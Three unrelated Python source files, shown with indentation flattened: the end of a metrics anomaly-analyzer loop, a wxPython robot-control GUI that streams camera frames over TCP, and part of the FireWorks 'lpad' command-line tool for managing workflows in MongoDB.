key, value = self.anomaly_breakdown_q.get_nowait()
if key not in anomaly_breakdown.keys():
anomaly_breakdown[key] = value
else:
anomaly_breakdown[key] += value
except Empty:
break
while 1:
try:
key, value = self.exceptions_q.get_nowait()
if key not in exceptions.keys():
exceptions[key] = value
else:
exceptions[key] += value
except Empty:
break
# Send alerts
if settings.ENABLE_ALERTS:
for alert in settings.ALERTS:
for metric in self.anomalous_metrics:
if alert[0] in metric[1]:
cache_key = 'last_alert.%s.%s' % (alert[1], metric[1])
try:
last_alert = self.redis_conn.get(cache_key)
if not last_alert:
self.redis_conn.setex(cache_key, alert[2], packb(metric[0]))
trigger_alert(alert, metric)
except Exception as e:
logger.error("couldn't send alert: %s" % e)
# Write anomalous_metrics to static webapp directory
file_name = 'anomalies.json'
filename = path.abspath(path.join(path.dirname(__file__), '..',
settings.ANOMALY_DUMP_DIRECTORY, file_name))
with open(filename, 'a') as fh:
# Make it JSONP with a handle_data() function
anomalous_metrics = list(self.anomalous_metrics)
anomalous_metrics.sort(key=operator.itemgetter(1))
fh.write('handle_data(%s)' % anomalous_metrics)
# Log progress
logger.info('seconds to run :: %.2f' % (time() - now))
logger.info('total metrics :: %d' % len(unique_metrics))
logger.info('total analyzed :: %d' % (len(unique_metrics) - sum(exceptions.values())))
logger.info('total anomalies :: %d' % len(self.anomalous_metrics))
logger.info('exception stats :: %s' % exceptions)
logger.info('anomaly breakdown :: %s' % anomaly_breakdown)
# Log to Graphite
self.send_graphite_metric('skyline.analyzer.run_time', '%.2f' % (time() - now))
self.send_graphite_metric('skyline.analyzer.total_analyzed', '%.2f' % (len(unique_metrics) - sum(exceptions.values())))
# Check canary metric
raw_series = self.redis_conn.get(settings.FULL_NAMESPACE + settings.CANARY_METRIC)
if raw_series is not None:
unpacker = Unpacker(use_list = False)
unpacker.feed(raw_series)
timeseries = list(unpacker)
time_human = (timeseries[-1][0] - timeseries[0][0]) / 3600
projected = 24 * (time() - now) / time_human
logger.info('canary duration :: %.2f' % time_human)
self.send_graphite_metric('skyline.analyzer.duration', '%.2f' % time_human)
self.send_graphite_metric('skyline.analyzer.projected', '%.2f' % projected)
# Reset counters
self.anomalous_metrics[:] = []
# Sleep if it went too fast
if time() - now < 5:
logger.info('sleeping due to low run time...')
sleep(10)
|
main.py
|
import SocketServer
import socket
import threading
import cv2
import numpy as np
import wx
from wx.lib.pubsub import pub
import about
class VideoStreamHandler(SocketServer.StreamRequestHandler):
"""docstring for ShowCapture"""
def handle(self):
stream_bytes = ' '
# stream video frames one by one
try:
while True:
stream_bytes += self.rfile.read(2048)
first = stream_bytes.find('\xff\xd8')
last = stream_bytes.find('\xff\xd9')
if first != -1 and last != -1:
jpg = stream_bytes[first:last + 2]
stream_bytes = stream_bytes[last + 2:]
image = cv2.imdecode(np.fromstring(jpg, dtype=np.uint8),
cv2.IMREAD_UNCHANGED)
wx.CallAfter(pub.sendMessage, "panelListener", image=image)
finally:
cv2.destroyAllWindows()
class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
"""docstring for ShowCapture"""
pass
class ThreadServer(object):
"""docstring for ShowCapture"""
def __init__(self):
# Host 0.0.0.0 means to listen all ip address
HOST, PORT = "0.0.0.0", 2016
self.server = ThreadedTCPServer((HOST, PORT), VideoStreamHandler)
ip, port = self.server.server_address
# Start a thread with the server -- that thread will then start one
# more thread for each request
server_thread = threading.Thread(target=self.server.serve_forever)
# Exit the server thread when the main thread terminates
server_thread.daemon = True
server_thread.start()
print "Server loop running in thread:", server_thread.name
print 'Starting up TCP Server. Server listening on {0} port {1}'.format(ip, port)
class ShowCapture(wx.Panel):
"""docstring for ShowCapture"""
def __init__(self, parent, fps=15):
wx.Panel.__init__(self, parent)
self.parent = parent
self.width, self.height = 640, 480
self.parent.SetSize((self.width, self.height))
self.fps = fps
pub.subscribe(self.ReceivedImage, "panelListener")
self.SetFocus()
def ReceivedImage(self, image):
self.capture = image
frame = self.capture
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
self.bmp = wx.BitmapFromBuffer(self.width, self.height, frame)
self.timer = wx.Timer(self)
self.timer.Start(1000./self.fps)
self.Bind(wx.EVT_PAINT, self.OnPaint)
self.Bind(wx.EVT_TIMER, self.NextFrame)
self.Bind(wx.EVT_KEY_DOWN, self.KeyboardCatch)
def OnPaint(self, evt):
dc = wx.BufferedPaintDC(self)
dc.DrawBitmap(self.bmp, 0, 0)
def NextFrame(self, event):
frame = self.capture
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
self.bmp.CopyFromBuffer(frame)
self.Refresh()
def KeyboardCatch(self, e):
keycode = e.GetKeyCode()
print keycode
message = ""
if keycode == 65:
message = "a"
elif keycode == 68:
message = "d"
elif keycode == 87:
message = "w"
elif keycode == 83:
message = "s"
else:
message = "Unknown command."
try:
self.client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.client.connect(('raspberrypi.mshome.net', 2015))
self.client.sendall(message)
self.parent.statusbar.SetStatusText("Send the following message: " + message)
except socket.error, err:
self.parent.statusbar.SetStatusText('Please start TCP server before running GUI. ' + \
'The command out is not working')
print err
except Exception, exc:
print exc
finally:
self.client.close()
class MainFrame(wx.Frame):
"""docstring for MainFrame"""
def __init__(self, parent, title):
super(MainFrame, self).__init__(parent, title=title)
self.threadServer = ThreadServer()
self.SetIcon(wx.Icon("images/icon.png"))
self.statusbar = self.CreateStatusBar()
self.InitUI()
def InitUI(self):
menubar = wx.MenuBar()
fileMenu = wx.Menu()
fitem = wx.MenuItem(fileMenu, wx.ID_EXIT, 'Quit\tCtrl+Q', 'Quit application')
fitem.SetBitmap(wx.Bitmap("images/exit.png"))
fileMenu.AppendItem(fitem)
helpMenu = wx.Menu()
aboutitem = wx.MenuItem(helpMenu, wx.ID_ABORT, 'About\tCtrl+A', 'About EmoBotControl')
aboutitem.SetBitmap(wx.Bitmap("images/about.png"))
helpMenu.AppendItem(aboutitem)
menubar.Append(fileMenu, '&File')
menubar.Append(helpMenu, '&Help')
self.SetMenuBar(menubar)
self.Bind(wx.EVT_MENU, self.OnQuit, fitem)
self.Bind(wx.EVT_MENU, self.OnAboutBox, aboutitem)
self.statusbar.SetStatusText('Ready')
def OnQuit(self, e):
self.threadServer.server.shutdown()
self.threadServer.server.server_close()
self.Close()
def OnAboutBox(self, e):
description = about.description
licence = about.licence
info = wx.AboutDialogInfo()
info.SetIcon(wx.Icon("images/icon.png", wx.BITMAP_TYPE_PNG))
info.SetName('EmoBotControl')
info.SetVersion('1.0')
info.SetDescription(description)
info.SetCopyright('(C) 2016 Daro Oem')
info.SetWebSite('http://www.facebook.com/daro.oem')
info.SetLicence(licence)
info.AddDeveloper('Daro Oem')
wx.AboutBox(info)
if __name__ == '__main__':
app = wx.App()
frame = MainFrame(None, title='Mind Bot Control')
frame.Centre()
cap = ShowCapture(frame)
frame.Show()
app.MainLoop()
|
lpad_run.py
|
# coding: utf-8
from __future__ import unicode_literals
import six
"""
A runnable script for managing a FireWorks database (a command-line interface to launchpad.py)
"""
from argparse import ArgumentParser, ArgumentTypeError
import copy
import os
import shutil
import re
import time
import ast
import json
import datetime
import traceback
from six.moves import input, zip
from flask import g
from pymongo import DESCENDING, ASCENDING
import ruamel_yaml as yaml
from fireworks.fw_config import RESERVATION_EXPIRATION_SECS, \
RUN_EXPIRATION_SECS, PW_CHECK_NUM, MAINTAIN_INTERVAL, CONFIG_FILE_DIR, \
LAUNCHPAD_LOC, FWORKER_LOC, WEBSERVER_PORT, WEBSERVER_HOST
from fireworks.features.fw_report import FWReport
from fireworks.features.introspect import Introspector
from fireworks.core.launchpad import LaunchPad, WFLock
from fireworks.core.firework import Workflow, Firework
from fireworks.core.fworker import FWorker
from fireworks import __version__ as FW_VERSION
from fireworks import FW_INSTALL_DIR
from fireworks.user_objects.firetasks.script_task import ScriptTask
from fireworks.utilities.fw_serializers import DATETIME_HANDLER, recursive_dict
__author__ = 'Anubhav Jain'
__credits__ = 'Shyue Ping Ong'
__copyright__ = 'Copyright 2013, The Materials Project'
__version__ = '0.1'
__maintainer__ = 'Anubhav Jain'
__email__ = 'ajain@lbl.gov'
__date__ = 'Feb 7, 2013'
DEFAULT_LPAD_YAML = "my_launchpad.yaml"
def pw_check(ids, args, skip_pw=False):
if len(ids) > PW_CHECK_NUM and not skip_pw:
m_password = datetime.datetime.now().strftime('%Y-%m-%d')
if not args.password:
if input('Are you sure? This will modify {} entries. (Y/N)'.format(len(ids)))[0].upper() == 'Y':
args.password = datetime.datetime.now().strftime('%Y-%m-%d')
else:
raise ValueError('Operation aborted by user.')
if args.password != m_password:
raise ValueError("Modifying more than {} entries requires setting the --password parameter! "
"(Today's date, e.g. 2012-02-25)".format(PW_CHECK_NUM))
return ids
def parse_helper(lp, args, wf_mode=False, skip_pw=False):
"""
Helper method to parse args that can take either id, name, state or query.
Args:
args
wf_mode (bool)
skip_pw (bool)
Returns:
list of ids
"""
if args.fw_id and sum([bool(x) for x in [args.name, args.state, args.query]]) >= 1:
raise ValueError('Cannot specify both fw_id and name/state/query)')
query = {}
if args.fw_id:
return pw_check(args.fw_id, args, skip_pw)
if args.query:
query = ast.literal_eval(args.query)
if args.name and 'launches_mode' in args and not args.launches_mode:
query['name'] = args.name
if args.state:
query['state'] = args.state
if hasattr(args, "sort") and args.sort:
sort = [(args.sort, ASCENDING)]
elif hasattr(args, "rsort") and args.rsort:
sort = [(args.rsort, DESCENDING)]
else:
sort = None
max = args.max if hasattr(args, "max") else 0
if wf_mode:
return pw_check(lp.get_wf_ids(query, sort=sort, limit=max), args, skip_pw)
return pw_check(lp.get_fw_ids(query, sort=sort, limit=max, launches_mode=args.launches_mode),
args, skip_pw)
def get_lp(args):
try:
if not args.launchpad_file:
if os.path.exists(os.path.join(args.config_dir, DEFAULT_LPAD_YAML)):
args.launchpad_file = os.path.join(args.config_dir, DEFAULT_LPAD_YAML)
else:
args.launchpad_file = LAUNCHPAD_LOC
if args.launchpad_file:
return LaunchPad.from_file(args.launchpad_file)
else:
args.loglvl = 'CRITICAL' if args.silencer else args.loglvl
return LaunchPad(logdir=args.logdir, strm_lvl=args.loglvl)
except Exception:
traceback.print_exc()
err_message = 'FireWorks was not able to connect to MongoDB. Is the server running? ' \
'The database file specified was {}.'.format(args.launchpad_file)
if not args.launchpad_file:
err_message += ' Type "lpad init" if you would like to set up a file that specifies ' \
'location and credentials of your Mongo database (otherwise use default ' \
'localhost configuration).'
raise ValueError(err_message)
def init_yaml(args):
if args.uri_mode:
fields = (
("host", None, "Example: mongodb+srv://USER:PASSWORD@CLUSTERNAME.mongodb.net/fireworks"),
("ssl_ca_file", None, "Path to any client certificate to be used for mongodb connection"),
("authsource", None,
"Database used for authentication, if not connection db. e.g., for MongoDB Atlas this is sometimes "
"'admin'."))
else:
fields = (
("host", "localhost", "Example: 'localhost' or 'mongodb+srv://CLUSTERNAME.mongodb.net'"),
("port", 27017, ""),
("name", "fireworks", "Database under which to store the fireworks collections"),
("username", None, "Username for MongoDB authentication"),
("password", None, "Password for MongoDB authentication"),
("ssl_ca_file", None, "Path to any client certificate to be used for Mongodb connection"),
("authsource", None,
"Database used for authentication, if not connection db. e.g., for MongoDB Atlas this is sometimes "
"'admin'."))
doc = {}
if args.uri_mode:
print(
"Note 1: You are in URI format mode. This means that all database parameters (username, password, host, "
"port, database name, etc.) must be present in the URI. See: "
"https://docs.mongodb.com/manual/reference/connection-string/ for details.")
print("(Enter your connection URI in under the 'host' parameter)")
print("Please supply the following configuration values")
print("(press Enter if you want to accept the defaults)\n")
for k, default, helptext in fields:
val = input("Enter {} parameter. (default: {}). {}: ".format(k, default, helptext))
doc[k] = val if val else default
if "port" in doc:
doc["port"] = int(doc["port"]) # enforce the port as an int
if args.uri_mode:
doc["uri_mode"] = True
lp = LaunchPad.from_dict(doc)
lp.to_file(args.config_file)
print("\nConfiguration written to {}!".format(args.config_file))
def reset(args):
lp = get_lp(args)
if not args.password:
if input('Are you sure? This will RESET {} workflows and all data. (Y/N)'.format(
lp.workflows.count()))[0].upper() == 'Y':
args.password = datetime.datetime.now().strftime('%Y-%m-%d')
else:
raise ValueError('Operation aborted by user.')
lp.reset(args.password)
def add_wf(args):
lp = get_lp(args)
if args.dir:
files = []
for f in args.wf_file:
files.extend([os.path.join(f, i) for i in os.listdir(f)])
else:
files = args.wf_file
for f in files:
fwf = Workflow.from_file(f)
if args.check:
from fireworks.utilities.dagflow import DAGFlow
DAGFlow.from_fireworks(fwf).check()
lp.add_wf(fwf)
def append_wf(args):
lp = get_lp(args)
lp.append_wf(
Workflow.from_file(args.wf_file),
args.fw_id,
detour=args.detour,
pull_spec_mods=args.pull_spec_mods
)
def dump_wf(args):
lp = get_lp(args)
lp.get_wf_by_fw_id(args.fw_id).to_file(args.wf_file)
def check_wf(args):
from fireworks.utilities.dagflow import DAGFlow
lp = get_lp(args)
DAGFlow.from_fireworks(lp.get_wf_by_fw_id(args.fw_id)).check()
def add_wf_dir(args):
lp = get_lp(args)
for filename in os.listdir(args.wf_dir):
fwf = Workflow.from_file(filename)
lp.add_wf(fwf)
def print_fws(ids, lp, args):
"""Prints results of some FireWorks query to stdout."""
fws = []
if args.display_format == 'ids':
fws = ids
elif args.display_format == 'count':
fws = [ids]
else:
for id in ids:
fw = lp.get_fw_by_id(id)
d = fw.to_dict()
d['state'] = d.get('state', 'WAITING')
if args.display_format == 'more' or args.display_format == 'less':
if 'archived_launches' in d:
del d['archived_launches']
del d['spec']
if args.display_format == 'less':
if 'launches' in d:
del d['launches']
fws.append(d)
if len(fws) == 1:
fws = fws[0]
print(args.output(fws))
def get_fw_ids_helper(lp, args, count_only=None):
"""Build fws query from command line options and submit.
Parameters:
lp (fireworks.core.firework.Launchpad)
args (argparse.Namespace)
count_only (bool): if None, then looked up in args.
Returns:
[int]: resulting fw_ids or count of fws in query.
"""
if sum([bool(x) for x in [args.fw_id, args.name, args.state, args.query]]) > 1:
raise ValueError('Please specify exactly one of (fw_id, name, state, query)')
if sum([bool(x) for x in [args.fw_id, args.name, args.state, args.query]]) == 0:
args.query = '{}'
args.display_format = args.display_format if args.display_format else 'ids'
if sum([bool(x) for x in [args.fw_id, args.name, args.qid]]) > 1:
raise ValueError('Please specify exactly one of (fw_id, name, qid)')
else:
args.display_format = args.display_format if args.display_format else 'more'
if args.fw_id:
query = {'fw_id': {"$in": args.fw_id}}
elif args.name and not args.launches_mode:
query = {'name': args.name}
elif args.state:
query = {'state': args.state}
elif args.query:
query = ast.literal_eval(args.query)
else:
query = None
if args.sort:
sort = [(args.sort, ASCENDING)]
elif args.rsort:
sort = [(args.rsort, DESCENDING)]
else:
sort = None
if count_only is None:
count_only = (args.display_format == 'count')
if args.qid:
ids = lp.get_fw_ids_from_reservation_id(args.qid)
if query:
query['fw_id'] = {"$in": ids}
ids = lp.get_fw_ids(query, sort, args.max, launches_mode=args.launches_mode)
else:
ids = lp.get_fw_ids(query, sort, args.max, count_only=count_only,
launches_mode=args.launches_mode)
return ids
def get_fws_helper(lp, ids, args):
"""Get fws from ids in a representation according to args.display_format."""
fws = []
if args.display_format == 'ids':
fws = ids
elif args.display_format == 'count':
fws = [ids]
else:
for id in ids:
fw = lp.get_fw_by_id(id)
d = fw.to_dict()
d['state'] = d.get('state', 'WAITING')
if args.display_format == 'more' or args.display_format == 'less':
if 'archived_launches' in d:
del d['archived_launches']
del d['spec']
if args.display_format == 'less':
if 'launches' in d:
del d['launches']
fws.append(d)
if len(fws) == 1:
fws = fws[0]
return fws
def get_fws(args):
lp = get_lp(args)
ids = get_fw_ids_helper(lp, args)
fws = get_fws_helper(lp, ids, args)
print(args.output(fws))
def get_fws_in_wfs(args):
# get_wfs
lp = get_lp(args)
if sum([bool(x) for x in [args.wf_fw_id, args.wf_name, args.wf_state, args.wf_query]]) > 1:
raise ValueError('Please specify exactly one of (fw_id, name, state, query)')
if sum([bool(x) for x in [args.wf_fw_id, args.wf_name, args.wf_state, args.wf_query]]) == 0:
args.wf_query = '{}'
if args.wf_fw_id:
wf_query = {'nodes': {"$in": args.wf_fw_id}}
elif args.wf_name:
wf_query = {'name': args.wf_name}
elif args.wf_state:
wf_query = {'state': args.wf_state}
else:
wf_query = ast.literal_eval(args.wf_query)
# get_fws
if sum([bool(x) for x in [args.fw_fw_id, args.fw_name, args.fw_state, args.fw_query]]) > 1:
raise ValueError('Please specify exactly one of (fw_id, name, state, query)')
if sum([bool(x) for x in [args.fw_fw_id, args.fw_name, args.fw_state, args.fw_query]]) == 0:
args.fw_query = '{}'
args.display_format = args.display_format if args.display_format else 'ids'
if sum([bool(x) for x in [args.fw_fw_id, args.fw_name, args.qid]]) > 1:
raise ValueError('Please specify exactly one of (fw_id, name, qid)')
else:
args.display_format = args.display_format if args.display_format else 'more'
if args.fw_fw_id:
fw_query = {'fw_id': {"$in": args.fw_fw_id}}
elif args.fw_name and not args.launches_mode:
fw_query = {'name': args.fw_name}
elif args.fw_state:
fw_query = {'state': args.fw_state}
elif args.fw_query:
fw_query = ast.literal_eval(args.fw_query)
else:
fw_query = None
if args.sort:
sort = [(args.sort, ASCENDING)]
elif args.rsort:
sort = [(args.rsort, DESCENDING)]
else:
sort = None
if args.qid:
ids = lp.get_fw_ids_from_reservation_id(args.qid)
if fw_query:
fw_query['fw_id'] = {"$in": ids}
ids = lp.get_fw_ids_in_wfs(wf_query=wf_query, fw_query=fw_query,
sort=sort, limit=args.max,
launches_mode=args.launches_mode)
else:
ids = lp.get_fw_ids_in_wfs(wf_query=wf_query, fw_query=fw_query,
sort=sort, limit=args.max,
count_only=args.display_format == 'count',
launches_mode=args.launches_mode)
print_fws(ids, lp, args)
def update_fws(args):
lp = get_lp(args)
fw_ids = parse_helper(lp, args)
lp.update_spec(fw_ids, json.loads(args.update), args.mongo)
def get_wfs(args):
lp = get_lp(args)
if sum([bool(x) for x in [args.fw_id, args.name, args.state, args.query]]) > 1:
raise ValueError('Please specify exactly one of (fw_id, name, state, query)')
if sum([bool(x) for x in [args.fw_id, args.name, args.state, args.query]]) == 0:
args.query = '{}'
args.display_format = args.display_format if args.display_format else 'ids'
else:
args.display_format = args.display_format if args.display_format else 'more'
if args.fw_id:
query = {'nodes': {"$in": args.fw_id}}
elif args.name:
query = {'name': args.name}
elif args.state:
query = {'state': args.state}
else:
query = ast.literal_eval(args.query)
if args.sort:
sort = [(args.sort, ASCENDING)]
elif args.rsort:
sort = [(args.rsort, DESCENDING)]
else:
sort = None
ids = lp.get_wf_ids(query, sort, args.max, count_only=args.display_format == 'count')
if args.display_format == 'ids':
wfs = ids
elif args.display_format == 'count':
wfs = [ids]
else:
wfs = []
for i in ids:
d = lp.get_wf_summary_dict(i, args.display_format)
d["name"] += "--%d" % i
wfs.append(d)
if args.table:
if wfs:
headers = list(wfs[0].keys())
from prettytable import PrettyTable
t = PrettyTable(headers)
for d in wfs:
t.add_row([d.get(k) for k in headers])
print(t)
else:
if len(wfs) == 1:
wfs = wfs[0]
print(args.output(wfs))
def delete_wfs(args):
lp = get_lp(args)
fw_ids = parse_helper(lp, args, wf_mode=True)
for f in fw_ids:
lp.delete_wf(f, delete_launch_dirs=args.delete_launch_dirs)
lp.m_logger.debug('Processed fw_id: {}'.format(f))
lp.m_logger.info('Finished deleting {} WFs'.format(len(fw_ids)))
def get_children(links, start, max_depth):
data = {}
for l, c in links.items():
if l == start:
if len(c) > 0:
data[l] = [get_children(links, i, max_depth) for i in c]
else:
data[l] = c
return data
def detect_lostruns(args):
lp = get_lp(args)
query = ast.literal_eval(args.query) if args.query else None
launch_query = ast.literal_eval(args.launch_query) if args.launch_query else None
fl, ff, fi = lp.detect_lostruns(expiration_secs=args.time, fizzle=args.fizzle, rerun=args.rerun,
max_runtime=args.max_runtime, min_runtime=args.min_runtime,
refresh=args.refresh, query=query, launch_query=launch_query)
lp.m_logger.debug('Detected {} lost launches: {}'.format(len(fl), fl))
lp.m_logger.info('Detected {} lost FWs: {}'.format(len(ff), ff))
if args.display_format is not None and args.display_format != 'none':
print_fws(ff, lp, args)
lp.m_logger.info('Detected {} inconsistent FWs: {}'.format(len(fi), fi))
if args.display_format is not None and args.display_format != 'none':
print_fws(fi, lp, args)
if len(ff) > 0 and not args.fizzle and not args.rerun:
print("You can fix lost FWs using the --rerun or --fizzle arguments to the "
"detect_lostruns command")
if len(fi) > 0 and not args.refresh:
print("You can fix inconsistent FWs using the --refresh argument to the "
"detect_lostruns command")
def detect_unreserved(args):
lp = get_lp(args)
if args.display_format is not None and args.display_format != 'none':
unreserved = lp.detect_unreserved(expiration_secs=args.time, rerun=False)
# very inefficient, replace by mongo aggregation
fw_ids = []
for launch_id in unreserved:
launch = lp.get_launch_by_id(launch_id)
fw_ids.append(launch.fw_id)
print_fws(fw_ids, lp, args)
print(lp.detect_unreserved(expiration_secs=args.time, rerun=args.rerun))
def tuneup(args):
lp = get_lp(args)
lp.tuneup(bkground=not args.full)
def defuse_wfs(args):
lp = get_lp(args)
fw_ids = parse_helper(lp, args, wf_mode=True)
for f in fw_ids:
lp.defuse_wf(f, defuse_all_states=args.defuse_all_states)
lp.m_logger.debug('Processed fw_id: {}'.format(f))
lp.m_logger.info('Finished defusing {} FWs.'.format(len(fw_ids)))
if not args.defuse_all_states:
lp.m_logger.info('Note: FIZZLED and COMPLETED FWs were not defused. '
'Use the --defuse_all_states option to force this (or rerun FIZZLED FWs first).')
def pause_wfs(args):
lp = get_lp(args)
fw_ids = parse_helper(lp, args, wf_mode=True)
for f in fw_ids:
lp.pause_wf(f)
lp.m_logger.debug('Processed fw_id: {}'.format(f))
lp.m_logger.info('Finished defusing {} FWs.'.format(len(fw_ids)))
def archive(args):
lp = get_lp(args)
fw_ids = parse_helper(lp, args, wf_mode=True)
for f in fw_ids:
lp.archive_wf(f)
lp.m_logger.debug('Processed fw_id: {}'.format(f))
lp.m_logger.info('Finished archiving {} WFs'.format(len(fw_ids)))
def reignite_wfs(args):
lp = get_lp(args)
fw_ids = parse_helper(lp, args, wf_mode=True)
for f in fw_ids:
lp.reignite_wf(f)
lp.m_logger.debug('Processed Workflow with fw_id: {}'.format(f))
lp.m_logger.info('Finished reigniting {} Workflows'.format(len(fw_ids)))
def defuse_fws(args):
lp = get_lp(args)
fw_ids = parse_helper(lp, args)
for f in fw_ids:
lp.defuse_fw(f)
lp.m_logger.debug('Processed fw_id: {}'.format(f))
lp.m_logger.info('Finished defusing {} FWs'.format(len(fw_ids)))
def pause_fws(args):
lp = get_lp(args)
fw_ids = parse_helper(lp, args)
for f in fw_ids:
lp.pause_fw(f)
lp.m_logger.debug('Processed fw_id: {}'.format(f))
lp.m_logger.info('Finished pausing {} FWs'.format(len(fw_ids)))
def reignite_fws(args):
lp = get_lp(args)
fw_ids = parse_helper(lp, args)
for f in fw_ids:
lp.reignite_fw(f)
lp.m_logger.debug('Processed fw_id: {}'.format(f))
lp.m_logger.info('Finished reigniting {} FWs'.format(len(fw_ids)))
def resume_fws(args):
lp = get_lp(args)
fw_ids = parse_helper(lp, args)
for f in fw_ids:
lp.resume_fw(f)
lp.m_logger.debug('Processed fw_id: {}'.format(f))
lp.m_logger.info('Finished resuming {} FWs'.format(len(fw_ids)))
def rerun_fws(args):
lp = get_lp(args)
fw_ids = parse_helper(lp, args)
if args.task_level:
launch_ids = args.launch_id
if launch_ids is None:
launch_ids = ['last'] * len(fw_ids)
elif len(launch_ids) != len(fw_ids):
raise ValueError("Specify the same number of tasks and launches")
else:
launch_ids = [None] * len(fw_ids)
for f, l in zip(fw_ids, launch_ids):
lp.rerun_fw(int(f), recover_launch=l, recover_mode=args.recover_mode)
lp.m_logger.debug('Processed fw_id: {}'.format(f))
lp.m_logger.info('Finished setting {} FWs to rerun'.format(len(fw_ids)))
def refresh(args):
lp = get_lp(args)
fw_ids = parse_helper(lp, args, wf_mode=True)
for f in fw_ids:
wf = lp.get_wf_by_fw_id_lzyfw(f)
for fw_id in wf.root_fw_ids:
lp._refresh_wf(fw_id)
lp.m_logger.debug('Processed Workflow with fw_id: {}'.format(f))
lp.m_logger.info('Finished refreshing {} Workflows'.format(len(fw_ids)))
def unlock(args):
lp = get_lp(args)
fw_ids = parse_helper(lp, args, wf_mode=True)
for f in fw_ids:
with WFLock(lp, f, expire_secs=0, kill=True):
lp.m_logger.warning('FORCIBLY RELEASING LOCK DUE TO USER COMMAND, WF: {}'.format(f))
lp.m_logger.debug('Processed Workflow with fw_id: {}'.format(f))
lp.m_logger.info('Finished unlocking {} Workflows'.format(len(fw_ids)))
def get_qid(args):
lp = get_lp(args)
for f in args.fw_id:
print(lp.get_reservation_id_from_fw_id(f))
def cancel_qid(args):
lp = get_lp(args)
lp.m_logger.warning("WARNING: cancel_qid does not actually remove jobs from the queue "
"(e.g., execute qdel), this must be done manually!")
lp.cancel_reservation_by_reservation_id(args.qid)
def set_priority(args):
wf_mode = args.wf
lp = get_lp(args)
fw_ids = parse_helper(lp, args, wf_mode=wf_mode)
if wf_mode:
all_fw_ids = set()
for fw_id in fw_ids:
wf = lp.get_wf_by_fw_id_lzyfw(fw_id)
all_fw_ids.update(wf.id_fw.keys())
fw_ids = list(all_fw_ids)
for f in fw_ids:
lp.set_priority(f, args.priority)
lp.m_logger.debug("Processed fw_id {}".format(f))
lp.m_logger.info("Finished setting priorities of {} FWs".format(len(fw_ids)))
def _open_webbrowser(url):
"""Open a web browser after a delay to give the web server more startup time."""
import webbrowser
time.sleep(2)
webbrowser.open(url)
def webgui(args):
from fireworks.flask_site.app import app
app.lp = get_lp(args)
if any([args.webgui_username, args.webgui_password]) and not \
all([args.webgui_username, args.webgui_password]):
raise ValueError("Must set BOTH a webgui_username and webgui_password!")
app.config["WEBGUI_USERNAME"] = args.webgui_username
app.config["WEBGUI_PASSWORD"] = args.webgui_password
if args.wflowquery:
app.BASE_Q_WF = json.loads(args.wflowquery)
if args.fwquery:
app.BASE_Q = json.loads(args.fwquery)
if "state" in app.BASE_Q:
app.BASE_Q_WF["state"] = app.BASE_Q["state"]
if not args.server_mode:
from threading import Thread
url = "http://{}:{}".format(args.host, args.port)
p1 = Thread(target=_open_webbrowser, args=(url,))
p1.start()
app.run(host=args.host, port=args.port, debug=args.debug)
p1.join()
else:
try:
from fireworks.flask_site.gunicorn import (
StandaloneApplication, number_of_workers)
except ImportError:
import sys
sys.exit("Gunicorn is required for server mode. "
"Install using `pip install gunicorn`.")
nworkers = args.nworkers if args.nworkers else number_of_workers()
options = {
'bind': '%s:%s' % (args.host, args.port),
'workers': nworkers,
}
StandaloneApplication(app, options).run()
def add_scripts(args):
lp = get_lp(args)
args.names = args.names if args.names else [None] * len(args.scripts)
args.wf_name = args.wf_name if args.wf_name else args.names[0]
fws = []
links = {}
for idx, s in enumerate(args.scripts):
fws.append(Firework(ScriptTask({'script': s, 'use_shell': True}), name=args.names[idx], fw_id=idx))
if idx != 0:
links[idx - 1] = idx
lp.add_wf(Workflow(fws, links, args.wf_name))
def recover_offline(args):
lp = get_lp(args)
fworker_name = FWorker.from_file(args.fworker_file).name if args.fworker_file else None
failed_fws = []
recovered_fws = []
for l in lp.offline_runs.find({"completed": False, "deprecated": False},
{"launch_id": 1, "fw_id": 1}):
if fworker_name and lp.launches.count({"launch_id": l["launch_id"],
"fworker.name": fworker_name}) == 0:
continue
fw = lp.recover_offline(l['launch_id'], args.ignore_errors, args.print_errors)
if fw:
failed_fws.append(l['fw_id'])
else:
recovered_fws.append(l['fw_id'])
lp.m_logger.info("FINISHED recovering offline runs. {} job(s) recovered: {}".format(
len(recovered_fws), recovered_fws))
if failed_fws:
lp.m_logger.info("FAILED to recover offline fw_ids: {}".format(failed_fws))
def forget_offline(args):
lp = get_lp(args)
fw_ids = parse_helper(lp, args)
for f in fw_ids:
lp.forget_offline(f, launch_mode=False)
lp.m_logger.debug('Processed fw_id: {}'.format(f))
lp.m_logger.info('Finished forget_offine, processed {} FWs'.format(len(fw_ids)))
def report(args):
lp = get_lp(args)
query = ast.literal_eval(args.query) if args.query else None
fwr = FWReport(lp)
stats = fwr.get_stats(coll=args.collection, interval=args.interval,
num_intervals=args.num_intervals, additional_query=query)
title_str = "Stats on {}".format(args.collection)
title_dec = "-" * len(title_str)
print(title_dec)
print(title_str)
print(title_dec)
print(fwr.get_stats_str(stats))
def introspect(args):
print("NOTE: This feature is in beta mode...")
lp = get_lp(args)
isp = Introspector(lp)
for coll in ['launches', 'tasks', 'fireworks', 'workflows']:
print('generating report for {}...please wait...'.format(coll))
print('')
table = isp.introspect_fizzled(coll=coll, threshold=args.threshold, limit=args.max)
isp.print_report(table, coll)
print('')
def get_launchdir(args):
lp = get_lp(args)
ld = lp.get_launchdir(args.fw_id, args.launch_idx)
print(ld)
def track_fws(args):
lp = get_lp(args)
fw_ids = parse_helper(lp, args, skip_pw=True)
include = args.include
exclude = args.exclude
first_print = True # used to control newline
for f in fw_ids:
data = lp.get_tracker_data(f)
output = []
for d in data:
for t in d['trackers']:
if (not include or t.filename in include) and (not exclude or t.filename not in exclude):
output.append('## Launch id: {}'.format(d['launch_id']))
output.append(str(t))
if output:
name = lp.fireworks.find_one({"fw_id": f}, {"name": 1})['name']
output.insert(0, '# FW id: {}, FW name: {}'.format(f, name))
if first_print:
first_print = False
else:
output.insert(0, '>------<')
print('\n'.join(output))
def version(args):
print('FireWorks version:', FW_VERSION)
print('located in:', FW_INSTALL_DIR)
def maintain(args):
lp = get_lp(args)
lp.maintain(args.infinite, args.maintain_interval)
def orphaned(args):
# get_fws
lp = get_lp(args)
fw_ids = get_fw_ids_helper(lp, args, count_only=False)
# get_wfs
orphaned_fw_ids = []
for fw_id in fw_ids:
query = {'nodes': fw_id}
wf_ids = lp.get_wf_ids(query)
if len(wf_ids) == 0:
